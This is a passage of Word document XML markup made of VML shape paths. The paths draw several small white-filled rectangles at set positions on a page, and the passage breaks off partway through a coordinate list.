2680,7928,2680,7927,2680,7925,2680,7924,2680,7923,2680,7921,2680,7920,2680,7918,2680,7917,2680,7915,2680,7914,2680,7912,2680,7910,2680,7908,2680,7906,2680,7904,2680,7902,2680,7900,2680,7898,2680,7896,2680,7894,2680,7891,2680,7889,2680,7887,2680,7884,2680,7882,2680,7879,2680,7876,2680,7873,2680,7870,2680,7868,2680,7865,2680,7861,2680,7858,2680,7855,2680,7852,2680,7848,2680,7845,2680,7841,2680,7838,2680,7834,2680,7830,2680,7826,2680,7822,2680,7818,2680,7814,2680,7810,2680,7806,2680,7801,2680,7797,2680,7792,2680,7787,2680,7783,2680,7778,2680,7773,2680,7768,2680,7763,2680,7757,2680,7752,2680,7746,2680,7741,2680,7735,2680,7730,2680,7724,2680,7718,2680,7712,2680,7706,2680,7699,2680,7693e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:415.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,8310" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:8310;width:130;height:270" coordorigin="2670,8310" coordsize="130,270" path="m2680,8338l2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2680,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2681,8338,2682,8338,2682,8338,2682,8338,2682,8338,2682,8338,2682,8338,2683,8338,2683,8338,2683,8338,2683,8338,2684,8338,2684,8338,2684,8338,2685,8338,2685,8338,2685,8338,2686,8338,2686,8338,2686,8338,2687,8338,2687,8338,2688,8338,2688,8338,2689,8338,2689,8338,2690,8338,2690,8338,2691,8338,2692,8338,2692,8338,2693,8338,2694,8338,2694,8338,2695,8338,2696,8338,2697,8338,2697,8338,2698,8338,2699,8338,2700,8338,2701,8338,2702,8338,2703,8338,2704,8338,2705,8338,2706,8338,2707,8338,2708,8338,2709,8338,2710,8338,2712,8338,2713,8338,2714,8338,2715,8338,2717,8338,2718,8338,2720,8338,2721,8338,2723,8338,2724,8338,2726,8338,2727,8338,2729,8338,2731,8338,2732,8338,2734,8338,2736,8338,2738,8338,2740,8338,2741,8338,2743,8338,2745,8338,2747,8338,2749,8338,2752,8338,2754,8338,2756,8338,2758,8338,2760,8338,2763,8338,2765,8338,2768,8338,2770,8338,2773,8338,2775,8338,2778,8338,2780,8338,2783,8338,2786,8338,2789,8338,2792,8338,2794,8338,2797,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8338,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8339,2800,8340,2800,8340,2800,8340,2800,8340,2800,8341,2800,8341,2800,8341,2800,8342,2800,8342,2800,8342,2800,8343,2800,8343,2800,8344,2800,8344,2800,8345,2800,8345,2800,8346,2800,8347,2800,8347,2800,8348,2800,8349,2800,8349,2800,8350,2800,8351,2800,8352,2800,8353,2800,8354,2800,8355,2800,8356,2800,8357,2800,8358,2800,8359,2800,8361,2800,8362,2800,8363,2800,8365,2800,8366,2800,8368,2800,8369,2800,8371,2800,8373,2800,8374,2800,8376,2800,8378,2800,8380,2800,8382,2800,8384,2800,8386,2800,8388,2800,8390,2800,8392,2800,8395,2800,8397,2800,8400,2800,8402,2800,8405,2800,8407,2800,8410,2800,8413,2800,8416,2800,8419,2800,8422,2800,8425,2800,8428,2800,8431,2800,8434,2800,8438,2800,8441,2800,8445,2800,8449,2800,8452,2800,8456,2800,8460,2800,8464,2800,8468,2800,8472,2800,8476,2800,8481,2800,8485,2800,8490,2800,8494,2800,8499,2800,8504,2800,8509,2800,8513,2800,8519,2800,8524,2800,8529,2800,8534,2800,8540,2800,8545,2800,8551,2800,8557,2800,8563,2800,8568,2800,8575,2800,8581,2800,8587,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2800,8593,2799,8593,2799,8593,2799,8593,2799,8593,2799,8593,2799,8593,2798,8593,2798,8593,2798,8593,2798,8593,2798,8593,2797,8593,2797,8593,2797,8593,2797,8593,2796,8593,2796,8593,2795,8593,2795,8593,2795,8593,2794,8593,2794,8593,2793,8593,2793,8593,2793,8593,2792,8593,2792,8593,2791,8593,2790,8593,2790,8593,2789,8593,2789,8593,2788,8593,2787,8593,2787,8593,2786,8593,2785,8593,2784,8593,2783,8593,2783,8593,2782,8593,2781,8593,2780,8593,2779,8593,2778,8593,2777,8593,2776,8593,2775,8593,2774,8593,2773,8593,2772,8593,2770,8593,2769,8593,2768,8593,2767,8593,2765,8593,2764,8593,2763,8593,2761,8593,2760,8593,2758,8593,2757,8593,2755,8593,2753,8593,2752,8593,2750,8593,2748,8593,2747,8593,2745,8593,2743,8593,2741,8593,2739,8593,2737,8593,2735,8593,2733,8593,2731,8593,2729,8593,2727,8593,2725,8593,2723,8593,2720,8593,2718,8593,2716,8593,2713,8593,2711,8593,2708,8593,2706,8593,2703,8593,2700,8593,2698,8593,2695,8593,2692,8593,2689,8593,2686,8593,2683,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8593,2680,8592,2680,8592,2680,8592,2680,8592,2680,8592,2680,8591,2680,8591,2680,8591,2680,8591,2680,8590,2680,8590,2680,8590,2680,8589,2680,8589,2680,8588,2680,8588,2680,8587,2680,8587,2680,8586,2680,8586,2680,8585,2680,8584,2680,8584,2680,8583,2680,8582,2680,8581,2680,8580,2680,8580,2680,8579,2680,8578,2680,8577,2680,8576,2680,8574,2680,8573,2680,8572,2680,8571,2680,8569,2680,8568,2680,8567,2680,8565,2680,8564,2680,8562,2680,8561,2680,8559,2680,8557,2680,8555,2680,8554,2680,8552,2680,8550,2680,8548,2680,8546,2680,8544,2680,8541,2680,8539,2680,8537,2680,8534,2680,8532,2680,8529,2680,8527,2680,8524,2680,8521,2680,8519,2680,8516,2680,8513,2680,8510,2680,8507,2680,8504,2680,8500,2680,8497,2680,8494,2680,8490,2680,8487,2680,8483,2680,8479,2680,8475,2680,8472,2680,8468,2680,8464,2680,8459,2680,8455,2680,8451,2680,8446,2680,8442,2680,8437,2680,8433,2680,8428,2680,8423,2680,8418,2680,8413,2680,8408,2680,8403,2680,8397,2680,8392,2680,8386,2680,8381,2680,8375,2680,8369,2680,8363,2680,8357,2680,8351,2680,8345,2680,8338e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:447.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,8950" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:8950;width:130;height:270" coordorigin="2670,8950" coordsize="130,270" path="m2680,8969l2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2680,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2681,8969,2682,8969,2682,8969,2682,8969,2682,8969,2682,8969,2682,8969,2683,8969,2683,8969,2683,8969,2683,8969,2684,8969,2684,8969,2684,8969,2685,8969,2685,8969,2685,8969,2686,8969,2686,8969,2686,8969,2687,8969,2687,8969,2688,8969,2688,8969,2689,8969,2689,8969,2690,8969,2690,8969,2691,8969,2692,8969,2692,8969,2693,8969,2694,8969,2694,8969,2695,8969,2696,8969,2697,8969,2697,8969,2698,8969,2699,8969,2700,8969,2701,8969,2702,8969,2703,8969,2704,8969,2705,8969,2706,8969,2707,8969,2708,8969,2709,8969,2710,8969,2712,8969,2713,8969,2714,8969,2715,8969,2717,8969,2718,8969,2720,8969,2721,8969,2723,8969,2724,8969,2726,8969,2727,8969,2729,8969,2731,8969,2732,8969,2734,8969,2736,8969,2738,8969,2740,8969,2741,8969,2743,8969,2745,8969,2747,8969,2749,8969,2752,8969,2754,8969,2756,8969,2758,8969,2760,8969,2763,8969,2765,8969,2768,8969,2770,8969,2773,8969,2775,8969,2778,8969,2780,8969,2783,8969,2786,8969,2789,8969,2792,8969,2794,8969,2797,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8969,2800,8970,2800,8970,2800,8970,2800,8970,2800,8970,2800,8971,2800,8971,2800,8971,2800,8971,2800,8972,2800,8972,2800,8973,2800,8973,2800,8973,2800,8974,2800,8974,2800,8975,2800,8976,2800,8976,2800,8977,2800,8977,2800,8978,2800,8979,2800,8980,2800,8981,2800,8981,2800,8982,2800,8983,2800,8984,2800,8985,2800,8986,2800,8987,2800,8989,2800,8990,2800,8991,2800,8992,2800,8994,2800,8995,2800,8997,2800,8998,2800,9000,2800,9001,2800,9003,2800,9005,2800,9006,2800,9008,2800,9010,2800,9012,2800,9014,2800,9016,2800,9018,2800,9020,2800,9023,2800,9025,2800,9027,2800,9030,2800,9032,2800,9035,2800,9038,2800,9040,2800,9043,2800,9046,2800,9049,2800,9052,2800,9055,2800,9058,2800,9061,2800,9065,2800,9068,2800,9072,2800,9075,2800,9079,2800,9083,2800,9086,2800,9090,2800,9094,2800,9098,2800,9102,2800,9107,2800,9111,2800,9115,2800,9120,2800,9125,2800,9129,2800,9134,2800,9139,2800,9144,2800,9149,2800,9154,2800,9159,2800,9165,2800,9170,2800,9176,2800,9181,2800,9187,2800,9193,2800,9199,2800,9205,2800,9211,2800,9217,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2800,9224,2799,9224,2799,9224,2799,9224,2799,9224,2799,9224,2799,9224,2798,9224,2798,9224,2798,9224,2798,9224,2798,9224,2797,9224,2797,9224,2797,9224,2797,9224,2796,9224,2796,9224,2795,9224,2795,9224,2795,9224,2794,9224,2794,9224,2793,9224,2793,9224,2793,9224,2792,9224,2792,9224,2791,9224,2790,9224,2790,9224,2789,9224,2789,9224,2788,9224,2787,9224,2787,9224,2786,9224,2785,9224,2784,9224,2783,9224,2783,9224,2782,9224,2781,9224,2780,9224,2779,9224,2778,9224,2777,9224,2776,9224,2775,9224,2774,9224,2773,9224,2772,9224,2770,9224,2769,9224,2768,9224,2767,9224,2765,9224,2764,9224,2763,9224,2761,9224,2760,9224,2758,9224,2757,9224,2755,9224,2753,9224,2752,9224,2750,9224,2748,9224,2747,9224,2745,9224,2743,9224,2741,9224,2739,9224,2737,9224,2735,9224,2733,9224,2731,9224,2729,9224,2727,9224,2725,9224,2723,9224,2720,9224,2718,9224,2716,9224,2713,9224,2711,9224,2708,9224,2706,9224,2703,9224,2700,9224,2698,9224,2695,9224,2692,9224,2689,9224,2686,9224,2683,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9224,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9223,2680,9222,2680,9222,2680,9222,2680,9222,2680,9222,2680,9221,2680,9221,2680,9221,2680,9220,2680,9220,2680,9220,2680,9219,2680,9219,2680,9218,2680,9218,2680,9217,2680,9217,2680,9216,2680,9215,2680,9215,2680,9214,2680,9213,2680,9212,2680,9212,2680,9211,2680,9210,2680,9209,2680,9208,2680,9207,2680,9206,2680,9205,2680,9204,2680,9202,2680,9201,2680,9200,2680,9198,2680,9197,2680,9196,2680,9194,2680,9193,2680,9191,2680,9189,2680,9188,2680,9186,2680,9184,2680,9182,2680,9180,2680,9178,2680,9176,2680,9174,2680,9172,2680,9169,2680,9167,2680,9165,2680,9162,2680,9160,2680,9157,2680,9155,2680,9152,2680,9149,2680,9146,2680,9143,2680,9140,2680,9137,2680,9134,2680,9131,2680,9127,2680,9124,2680,9120,2680,9117,2680,9113,2680,9110,2680,9106,2680,9102,2680,9098,2680,9094,2680,9090,2680,9085,2680,9081,2680,9077,2680,9072,2680,9068,2680,9063,2680,9058,2680,9053,2680,9048,2680,9043,2680,9038,2680,9033,2680,9028,2680,9022,2680,9017,2680,9011,2680,9005,2680,8999,2680,8993,2680,8987,2680,8981,2680,8975,2680,8969e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:479.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,9590" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:9590;width:130;height:270" coordorigin="2670,9590" coordsize="130,270" path="m2680,9614l2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2680,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2681,9614,2682,9614,2682,9614,2682,9614,2682,9614,2682,9614,2682,9614,2683,9614,2683,9614,2683,9614,2683,9614,2684,9614,2684,9614,2684,9614,2685,9614,2685,9614,2685,9614,2686,9614,2686,9614,2686,9614,2687,9614,2687,9614,2688,9614,2688,9614,2689,9614,2689,9614,2690,9614,2690,9614,2691,9614,2692,9614,2692,9614,2693,9614,2694,9614,2694,9614,2695,9614,2696,9614,2697,9614,2697,9614,2698,9614,2699,9614,2700,9614,2701,9614,2702,9614,2703,9614,2704,9614,2705,9614,2706,9614,2707,9614,2708,9614,2709,9614,2710,9614,2712,9614,2713,9614,2714,9614,2715,9614,2717,9614,2718,9614,2720,9614,2721,9614,2723,9614,2724,9614,2726,9614,2727,9614,2729,9614,2731,9614,2732,9614,2734,9614,2736,9614,2738,9614,2740,9614,2741,9614,2743,9614,2745,9614,2747,9614,2749,9614,2752,9614,2754,9614,2756,9614,2758,9614,2760,9614,2763,9614,2765,9614,2768,9614,2770,9614,2773,9614,2775,9614,2778,9614,2780,9614,2783,9614,2786,9614,2789,9614,2792,9614,2794,9614,2797,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9614,2800,9615,2800,9615,2800,9615,2800,9615,2800,9615,2800,9615,2800,9616,2800,9616,2800,9616,2800,9617,2800,9617,2800,9617,2800,9618,2800,9618,2800,9618,2800,9619,2800,9619,2800,9620,2800,9620,2800,9621,2800,9622,2800,9622,2800,9623,2800,9624,2800,9624,2800,9625,2800,9626,2800,9627,2800,9628,2800,9629,2800,9630,2800,9631,2800,9632,2800,9633,2800,9634,2800,9635,2800,9636,2800,9638,2800,9639,2800,9640,2800,9642,2800,9643,2800,9645,2800,9647,2800,9648,2800,9650,2800,9652,2800,9654,2800,9655,2800,9657,2800,9659,2800,9661,2800,9664,2800,9666,2800,9668,2800,9670,2800,9673,2800,9675,2800,9678,2800,9680,2800,9683,2800,9686,2800,9688,2800,9691,2800,9694,2800,9697,2800,9700,2800,9704,2800,9707,2800,9710,2800,9714,2800,9717,2800,9721,2800,9724,2800,9728,2800,9732,2800,9736,2800,9740,2800,9744,2800,9748,2800,9752,2800,9756,2800,9761,2800,9765,2800,9770,2800,9775,2800,9779,2800,9784,2800,9789,2800,9794,2800,9799,2800,9805,2800,9810,2800,9815,2800,9821,2800,9827,2800,9832,2800,9838,2800,9844,2800,9850,2800,9856,2800,9863,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2800,9869,2799,9869,2799,9869,2799,9869,2799,9869,2799,9869,2799,9869,2798,9869,2798,9869,2798,9869,2798,9869,2798,9869,2797,9869,2797,9869,2797,9869,2797,9869,2796,9869,2796,9869,2795,9869,2795,9869,2795,9869,2794,9869,2794,9869,2793,9869,2793,9869,2793,9869,2792,9869,2792,9869,2791,9869,2790,9869,2790,9869,2789,9869,2789,9869,2788,9869,2787,9869,2787,9869,2786,9869,2785,9869,2784,9869,2783,9869,2783,9869,2782,9869,2781,9869,2780,9869,2779,9869,2778,9869,2777,9869,2776,9869,2775,9869,2774,9869,2773,9869,2772,9869,2770,9869,2769,9869,2768,9869,2767,9869,2765,9869,2764,9869,2763,9869,2761,9869,2760,9869,2758,9869,2757,9869,2755,9869,2753,9869,2752,9869,2750,9869,2748,9869,2747,9869,2745,9869,2743,9869,2741,9869,2739,9869,2737,9869,2735,9869,2733,9869,2731,9869,2729,9869,2727,9869,2725,9869,2723,9869,2720,9869,2718,9869,2716,9869,2713,9869,2711,9869,2708,9869,2706,9869,2703,9869,2700,9869,2698,9869,2695,9869,2692,9869,2689,9869,2686,9869,2683,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9869,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9868,2680,9867,2680,9867,2680,9867,2680,9867,2680,9866,2680,9866,2680,9866,2680,9865,2680,9865,2680,9864,2680,9864,2680,9864,2680,9863,2680,9862,2680,9862,2680,9861,2680,9861,2680,9860,2680,9859,2680,9859,2680,9858,2680,9857,2680,9856,2680,9855,2680,9854,2680,9853,2680,9852,2680,9851,2680,9850,2680,9849,2680,9848,2680,9846,2680,9845,2680,9844,2680,9842,2680,9841,2680,9839,2680,9838,2680,9836,2680,9835,2680,9833,2680,9831,2680,9829,2680,9827,2680,9825,2680,9823,2680,9821,2680,9819,2680,9817,2680,9815,2680,9812,2680,9810,2680,9808,2680,9805,2680,9803,2680,9800,2680,9797,2680,9794,2680,9791,2680,9789,2680,9785,2680,9782,2680,9779,2680,9776,2680,9773,2680,9769,2680,9766,2680,9762,2680,9759,2680,9755,2680,9751,2680,9747,2680,9743,2680,9739,2680,9735,2680,9731,2680,9726,2680,9722,2680,9718,2680,9713,2680,9708,2680,9704,2680,9699,2680,9694,2680,9689,2680,9684,2680,9678,2680,9673,2680,9667,2680,9662,2680,9656,2680,9651,2680,9645,2680,9639,2680,9633,2680,9626,2680,9620,2680,9614e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:511.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,10230" coordsize="130,250">
        <v:shape style="position:absolute;left:2670;top:10230;width:130;height:250" coordorigin="2670,10230" coordsize="130,250" path="m2680,10244l2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2680,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2681,10244,2682,10244,2682,10244,2682,10244,2682,10244,2682,10244,2682,10244,2683,10244,2683,10244,2683,10244,2683,10244,2684,10244,2684,10244,2684,10244,2685,10244,2685,10244,2685,10244,2686,10244,2686,10244,2686,10244,2687,10244,2687,10244,2688,10244,2688,10244,2689,10244,2689,10244,2690,10244,2690,10244,2691,10244,2692,10244,2692,10244,2693,10244,2694,10244,2694,10244,2695,10244,2696,10244,2697,10244,2697,10244,2698,10244,2699,10244,2700,10244,2701,10244,2702,10244,2703,10244,2704,10244,2705,10244,2706,10244,2707,10244,2708,10244,2709,10244,2710,10244,2712,10244,2713,10244,2714,10244,2715,10244,2717,10244,2718,10244,2720,10244,2721,10244,2723,10244,2724,10244,2726,10244,2727,10244,2729,10244,2731,10244,2732,10244,2734,10244,2736,10244,2738,10244,2740,10244,2741,10244,2743,10244,2745,10244,2747,10244,2749,10244,2752,10244,2754,10244,2756,10244,2758,10244,2760,10244,2763,10244,2765,10244,2768,10244,2770,10244,2773,10244,2775,10244,2778,10244,2780,10244,2783,10244,2786,10244,2789,10244,2792,10244,2794,10244,2797,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10244,2800,10245,2800,10245,2800,10245,2800,10245,2800,10245,2800,10245,2800,10245,2800,10246,2800,10246,2800,10246,2800,10246,2800,10247,2800,10247,2800,10247,2800,10247,2800,10248,2800,10248,2800,10249,2800,10249,2800,10250,2800,10250,2800,10251,2800,10251,2800,10252,2800,10252,2800,10253,2800,10254,2800,10255,2800,10255,2800,10256,2800,10257,2800,10258,2800,10259,2800,10260,2800,10261,2800,10262,2800,10263,2800,10264,2800,10265,2800,10267,2800,10268,2800,10269,2800,10271,2800,10272,2800,10274,2800,10275,2800,10277,2800,10279,2800,10280,2800,10282,2800,10284,2800,10286,2800,10288,2800,10290,2800,10292,2800,10294,2800,10296,2800,10298,2800,10301,2800,10303,2800,10306,2800,10308,2800,10311,2800,10313,2800,10316,2800,10319,2800,10322,2800,10325,2800,10328,2800,10331,2800,10334,2800,10337,2800,10340,2800,10344,2800,10347,2800,10351,2800,10355,2800,10358,2800,10362,2800,10366,2800,10370,2800,10374,2800,10378,2800,10382,2800,10387,2800,10391,2800,10396,2800,10400,2800,10405,2800,10410,2800,10414,2800,10419,2800,10424,2800,10430,2800,10435,2800,10440,2800,10446,2800,10451,2800,10457,2800,10463,2800,10468,2800,10474,2800,10480,2800,10487,2800,10493,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2800,10499,2799,10499,2799,10499,2799,10499,2799,10499,2799,10499,2799,10499,2798,10499,2798,10499,2798,10499,2798,10499,2798,10499,2797,10499,2797,10499,2797,10499,2797,10499,2796,10499,2796,10499,2795,10499,2795,10499,2795,10499,2794,10499,2794,10499,2793,10499,2793,10499,2793,10499,2792,10499,2792,10499,2791,10499,2790,10499,2790,10499,2789,10499,2789,10499,2788,10499,2787,10499,2787,10499,2786,10499,2785,10499,2784,10499,2783,10499,2783,10499,2782,10499,2781,10499,2780,10499,2779,10499,2778,10499,2777,10499,2776,10499,2775,10499,2774,10499,2773,10499,2772,10499,2770,10499,2769,10499,2768,10499,2767,10499,2765,10499,2764,10499,2763,10499,2761,10499,2760,10499,2758,10499,2757,10499,2755,10499,2753,10499,2752,10499,2750,10499,2748,10499,2747,10499,2745,10499,2743,10499,2741,10499,2739,10499,2737,10499,2735,10499,2733,10499,2731,10499,2729,10499,2727,10499,2725,10499,2723,10499,2720,10499,2718,10499,2716,10499,2713,10499,2711,10499,2708,10499,2706,10499,2703,10499,2700,10499,2698,10499,2695,10499,2692,10499,2689,10499,2686,10499,2683,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10499,2680,10498,2680,10498,2680,10498,2680,10498,2680,10498,2680,10497,2680,10497,2680,10497,2680,10497,2680,10496,2680,10496,2680,10496,2680,10495,2680,10495,2680,10494,2680,10494,2680,10493,2680,10493,2680,10492,2680,10492,2680,10491,2680,10490,2680,10490,2680,10489,2680,10488,2680,10487,2680,10486,2680,10485,2680,10485,2680,10484,2680,10483,2680,10481,2680,10480,2680,10479,2680,10478,2680,10477,2680,10475,2680,10474,2680,10473,2680,10471,2680,10470,2680,10468,2680,10467,2680,10465,2680,10463,2680,10461,2680,10460,2680,10458,2680,10456,2680,10454,2680,10452,2680,10450,2680,10447,2680,10445,2680,10443,2680,10440,2680,10438,2680,10435,2680,10433,2680,10430,2680,10427,2680,10425,2680,10422,2680,10419,2680,10416,2680,10413,2680,10410,2680,10406,2680,10403,2680,10400,2680,10396,2680,10393,2680,10389,2680,10385,2680,10381,2680,10378,2680,10374,2680,10369,2680,10365,2680,10361,2680,10357,2680,10352,2680,10348,2680,10343,2680,10339,2680,10334,2680,10329,2680,10324,2680,10319,2680,10314,2680,10309,2680,10303,2680,10298,2680,10292,2680,10287,2680,10281,2680,10275,2680,10269,2680,10263,2680,10257,2680,10251,2680,10244e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:133.500pt;margin-top:543.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2670,10870" coordsize="130,270">
        <v:shape style="position:absolute;left:2670;top:10870;width:130;height:270" coordorigin="2670,10870" coordsize="130,270" path="m2680,10889l2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2680,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2681,10889,2682,10889,2682,10889,2682,10889,2682,10889,2682,10889,2682,10889,2683,10889,2683,10889,2683,10889,2683,10889,2684,10889,2684,10889,2684,10889,2685,10889,2685,10889,2685,10889,2686,10889,2686,10889,2686,10889,2687,10889,2687,10889,2688,10889,2688,10889,2689,10889,2689,10889,2690,10889,2690,10889,2691,10889,2692,10889,2692,10889,2693,10889,2694,10889,2694,10889,2695,10889,2696,10889,2697,10889,2697,10889,2698,10889,2699,10889,2700,10889,2701,10889,2702,10889,2703,10889,2704,10889,2705,10889,2706,10889,2707,10889,2708,10889,2709,10889,2710,10889,2712,10889,2713,10889,2714,10889,2715,10889,2717,10889,2718,10889,2720,10889,2721,10889,2723,10889,2724,10889,2726,10889,2727,10889,2729,10889,2731,10889,2732,10889,2734,10889,2736,10889,2738,10889,2740,10889,2741,10889,2743,10889,2745,10889,2747,10889,2749,10889,2752,10889,2754,10889,2756,10889,2758,10889,2760,10889,2763,10889,2765,10889,2768,10889,2770,10889,2773,10889,2775,10889,2778,10889,2780,10889,2783,10889,2786,10889,2789,10889,2792,10889,2794,10889,2797,10889,2800,10889,2800,10889,2800,10889,2800,10889,2800,10889,2800,10889,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10890,2800,10891,2800,10891,2800,10891,2800,10891,2800,10891,2800,10892,2800,10892,2800,10892,2800,10892,2800,10893,2800,10893,2800,10894,2800,10894,2800,10894,2800,10895,2800,10895,2800,10896,2800,10897,2800,10897,2800,10898,2800,10898,2800,10899,2800,10900,2800,10901,2800,10902,2800,10902,2800,10903,2800,10904,2800,10905,2800,10906,2800,10907,2800,10908,2800,10910,2800,10911,2800,10912,2800,10913,2800,10915,2800,10916,2800,10918,2800,10919,2800,10921,2800,10922,2800,10924,2800,10926,2800,10927,2800,10929,2800,10931,2800,10933,2800,10935,2800,10937,2800,10939,2800,10941,2800,10944,2800,10946,2800,10948,2800,10951,2800,10953,2800,10956,2800,10959,2800,10961,2800,10964,2800,10967,2800,10970,2800,10973,2800,10976,2800,10979,2800,10982,2800,10986,2800,10989,2800,10993,2800,10996,2800,11000,2800,11004,2800,11007,2800,11011,2800,11015,2800,11019,2800,11023,2800,11028,2800,11032,2800,11036,2800,11041,2800,11045,2800,11050,2800,11055,2800,11060,2800,11065,2800,11070,2800,11075,2800,11080,2800,11086,2800,11091,2800,11097,2800,11102,2800,11108,2800,11114,2800,11120,2800,11126,2800,11132,2800,11138,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2800,11145,2799,11145,2799,11145,2799,11145,2799,11145,2799,11145,2799,11145,2798,11145,2798,11145,2798,11145,2798,11145,2798,11145,2797,11145,2797,11145,2797,11145,2797,11145,2796,11145,2796,11145,2795,11145,2795,11145,2795,11145,2794,11145,2794,11145,2793,11145,2793,11145,2793,11145,2792,11145,2792,11145,2791,11145,2790,11145,2790,11145,2789,11145,2789,11145,2788,11145,2787,11145,2787,11145,2786,11145,2785,11145,2784,11145,2783,11145,2783,11145,2782,11145,2781,11145,2780,11145,2779,11145,2778,11145,2777,11145,2776,11145,2775,11145,2774,111